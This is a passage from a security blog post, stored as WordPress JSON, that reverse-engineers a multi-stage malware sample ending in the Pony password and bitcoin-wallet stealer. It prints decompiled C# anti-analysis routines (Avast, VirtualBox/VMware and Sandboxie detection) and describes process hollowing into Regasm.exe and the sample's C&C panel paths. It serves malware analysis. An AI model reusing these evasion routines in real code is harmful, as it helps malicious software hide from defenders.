href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p9.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p9-300x208.png\" alt=\"p9\" width=\"300\" height=\"208\" class=\"alignnone size-medium wp-image-1170\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p9-300x208.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p9-1024x711.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p9.png 1067w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>While we *could* copy and paste this into a project of our own to decrypt the mystery bitmap image, its much easier to extract after the process hollowing operation is performed. <\/p>\n<p>Other interesting tidbits include code that checks for the presence of Avast anti-virus:<br \/>\n<!-- HTML generated using hilite.me --><\/p>\n<div style=\"background: #000000; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\"><span style=\"color: #cdcd00\">public<\/span> <span style=\"color: #cdcd00\">static<\/span> <span style=\"color: #cdcd00\">void<\/span> <span style=\"color: #cccccc\">avast()<\/span>\r\n<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cdcd00\">try<\/span>\r\n\t<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cccccc\">IntPtr<\/span> <span style=\"color: #cccccc\">moduleHandle<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">flfvdNHm.GetModuleHandle(<\/span><span style=\"color: #cd0000\">&quot;snxhk.dll&quot;<\/span><span style=\"color: #cccccc\">);<\/span>\r\n\t<span style=\"color: #cdcd00\">while<\/span> <span style=\"color: #cccccc\">(moduleHandle<\/span> <span style=\"color: #cccccc\">!=<\/span> <span style=\"color: #cccccc\">IntPtr.Zero)<\/span>\r\n     <span style=\"color: #cccccc\">{<\/span>\r\n       <span style=\"color: #cccccc\">moduleHandle<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">flfvdNHm.GetModuleHandle(<\/span><span style=\"color: #cd0000\">&quot;snxhk.dll&quot;<\/span><span style=\"color: #cccccc\">);<\/span>\r\n\t   <span style=\"color: #cccccc\">Thread.Sleep(<\/span><span style=\"color: #cd00cd\">1000<\/span><span style=\"color: #cccccc\">);<\/span>\r\n     <span style=\"color: #cccccc\">}<\/span>\r\n\t<span style=\"color: #cccccc\">}<\/span>\r\n\t<span style=\"color: #cdcd00\">catch<\/span>\r\n\t<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cccccc\">}<\/span>\r\n<span style=\"color: #cccccc\">}<\/span>\r\n<\/pre>\n<\/div>\n<p>And then there&#8217;s these two methods which handle Virtual Machine and Sandboxie detection:<br \/>\n<!-- HTML generated using hilite.me --><\/p>\n<div style=\"background: #000000; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\"><span style=\"color: #cdcd00\">private<\/span> <span style=\"color: #cdcd00\">static<\/span> <span style=\"color: #00cd00\">bool<\/span> <span style=\"color: #cccccc\">VMRunning()<\/span>\r\n<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cccccc\">List&lt;<\/span><span style=\"color: #00cd00\">string<\/span><span style=\"color: #cccccc\">&gt;<\/span> <span style=\"color: #cccccc\">list<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">List&lt;<\/span><span style=\"color: #00cd00\">string<\/span><span style=\"color: #cccccc\">&gt;();<\/span>\r\n\t<span style=\"color: #cdcd00\">using<\/span> <span style=\"color: #cccccc\">(ManagementObjectCollection.ManagementObjectEnumerator<\/span> <span style=\"color: #cccccc\">enumerator<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">ManagementObjectSearcher(<\/span><span style=\"color: #cd0000\">&quot;SELECT Description FROM Win32_VideoController&quot;<\/span><span style=\"color: #cccccc\">).Get().GetEnumerator())<\/span>\r\n<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cdcd00\">while<\/span> <span style=\"color: #cccccc\">(enumerator.MoveNext())<\/span>\r\n\t<span style=\"color: #cccccc\">{<\/span>\r\n\t\t<span style=\"color: #cccccc\">ManagementObject<\/span> <span style=\"color: #cccccc\">managementObject<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">(ManagementObject)enumerator.Current;<\/span>\r\n\t\t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(managementObject[<\/span><span style=\"color: #cd0000\">&quot;Description&quot;<\/span><span style=\"color: #cccccc\">]<\/span> <span style=\"color: #cccccc\">!=<\/span> <span style=\"color: #cdcd00\">null<\/span><span style=\"color: #cccccc\">)<\/span>\r\n\t\t<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cccccc\">list.Add(Convert.ToString(managementObject[<\/span><span style=\"color: #cd0000\">&quot;Description&quot;<\/span><span style=\"color: #cccccc\">]).Trim().ToLower());<\/span>\r\n\t\t<span style=\"color: #cccccc\">}<\/span>\r\n\t<span style=\"color: #cccccc\">}<\/span>\r\n<span style=\"color: #cccccc\">}<\/span>\r\n\t<span style=\"color: #cdcd00\">return<\/span> <span style=\"color: #cccccc\">list.Contains(<\/span><span style=\"color: #cd0000\">&quot;virtualbox graphics adapter&quot;<\/span><span style=\"color: #cccccc\">)<\/span> <span style=\"color: #cccccc\">||<\/span> <span style=\"color: #cccccc\">list.Contains(<\/span><span style=\"color: #cd0000\">&quot;vmware svga ii&quot;<\/span><span style=\"color: #cccccc\">)<\/span> <span style=\"color: #cccccc\">||<\/span> <span style=\"color: #cccccc\">list.Contains(<\/span><span style=\"color: #cd0000\">&quot;vm additions s3 trio32\/64&quot;<\/span><span style=\"color: #cccccc\">);<\/span>\r\n\t\t<span style=\"color: #cccccc\">}<\/span>\r\n\r\n<span style=\"color: #cdcd00\">private<\/span> <span style=\"color: #cdcd00\">static<\/span> <span style=\"color: #00cd00\">bool<\/span> <span style=\"color: #cccccc\">antiSandie()<\/span>\r\n<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cccccc\">Process[]<\/span> <span style=\"color: #cccccc\">processes<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">Process.GetProcesses();<\/span>\r\n\t<span style=\"color: #cdcd00\">for<\/span> <span style=\"color: #cccccc\">(<\/span><span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">i<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">;<\/span> <span style=\"color: #cccccc\">i<\/span> <span style=\"color: #cccccc\">&lt;<\/span> <span style=\"color: #cccccc\">processes.Length;<\/span> <span style=\"color: #cccccc\">i++)<\/span>\r\n\t<span style=\"color: #cccccc\">{<\/span>\r\n\t<span style=\"color: #cccccc\">Process<\/span> <span style=\"color: #cccccc\">process<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">processes[i];<\/span>\r\n\t<span style=\"color: #00cd00\">string<\/span> <span style=\"color: #cccccc\">a<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">process.ProcessName.ToLower();<\/span>\r\n\t\t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(a<\/span> <span style=\"color: #cccccc\">==<\/span> <span style=\"color: #cd0000\">&quot;sandboxierpcss&quot;<\/span> <span style=\"color: #cccccc\">&amp;&amp;<\/span> <span style=\"color: #cccccc\">Process.GetCurrentProcess().SessionId<\/span> <span style=\"color: #cccccc\">==<\/span> <span style=\"color: #cccccc\">process.SessionId)<\/span>\r\n\t\t<span style=\"color: #cccccc\">{<\/span>\r\n\t\t<span style=\"color: #cccccc\">ProjectData.EndApp();<\/span>\r\n\t\t<span style=\"color: #cccccc\">}<\/span>\r\n\t<span style=\"color: #cccccc\">}<\/span>\r\n\t<span style=\"color: #cdcd00\">return<\/span> <span style=\"color: #cdcd00\">false<\/span><span style=\"color: #cccccc\">;<\/span>\r\n<span style=\"color: #cccccc\">}<\/span>\r\n<\/pre>\n<\/div>\n<p>This code doesn&#8217;t really work on my VMware instance though, making it worthless. Then again, who the hell checks for JUST Avast?<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1423877419611.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1423877419611.png\" alt=\"1423877419611\" width=\"438\" height=\"877\" class=\"alignnone size-full wp-image-1169\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1423877419611.png 438w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1423877419611-150x300.png 150w\" sizes=\"(max-width: 438px) 100vw, 438px\" \/><\/a><\/p>\n<p>So how do we get at this new file? Easily. Remember the in the video how I killed &#8216;Regasm.exe&#8217;? That&#8217;s where the data is injected. A simple matter of dumping the exe while its running will reveal our final payload. To save time again, here&#8217;s another video.<\/p>\n<p><iframe loading=\"lazy\" width=\"420\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/bymtblXZrrQ\" frameborder=\"0\" allowfullscreen><\/iframe><\/p>\n<p>So what is this weird pony icon exe?<br \/>\nLoading the sample up with IDA and looking at the strings is a good start.<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p11.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p11-300x169.png\" alt=\"p11\" width=\"300\" height=\"169\" class=\"alignnone size-medium wp-image-1173\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p11-300x169.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p11-1024x576.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p11.png 1920w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Googling around for the strings &#8216;moni\/panel\/Pony.exe&#8217; and &#8216;moni\/panel\/gate.php&#8217; proved fruitful. The malware is called &#8216;pony&#8217; (of course) so I wasn&#8217;t too far off in my assumptions. <a href=\"https:\/\/www.damballa.com\/pony-loader-2-0-steals-credentials-bitcoin-wallets-source-code-sale\/\" target=\"_blank\">According to this<\/a> the 3rd stage is a password stealer. <\/p>\n<p>Continuing to look at strings confirms this. Who knew there were so many kinds of bitcoins?<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p13.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p13-224x300.png\" alt=\"p13\" width=\"224\" height=\"300\" class=\"alignnone size-medium wp-image-1174\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p13-224x300.png 224w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p13.png 758w\" sizes=\"(max-width: 224px) 100vw, 224px\" \/><\/a><\/p>\n<p>And there you have it, all 3 stages of execution, the C&#038;C, the injection method, and the target (passwords &#038; bitcoins).<\/p>\n<p>Join me again soon when I cover the basics of reversing exploits in PDF and Word documents.<\/p>\n<p>Until then, happy hacking!<\/p>\n<p><a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1209918058568.jpg\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1209918058568-547x1024.jpg\" alt=\"1209918058568\" width=\"547\" height=\"1024\" class=\"alignnone size-large wp-image-1175\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1209918058568-547x1024.jpg 547w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1209918058568-160x300.jpg 160w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1209918058568.jpg 749w\" sizes=\"(max-width: 547px) 100vw, 547px\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Howdy fellow readers. My time is split between video games, code, and work. I have a number of interesting samples I&#8217;ve seen that I&#8217;ve decided to share with you all. This is a 3+ stage malware. Each stage meaning its own executable (think inception, but with exes). This isn&#8217;t all that uncommon with malware. Typically [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,7],"tags":[48],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1156"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=1156"}],"version-history":[{"count":6,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1156\/revisions"}],"predecessor-version":[{"id":1177,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1156\/revisions\/1177"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=1156"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=1156"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=1156"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}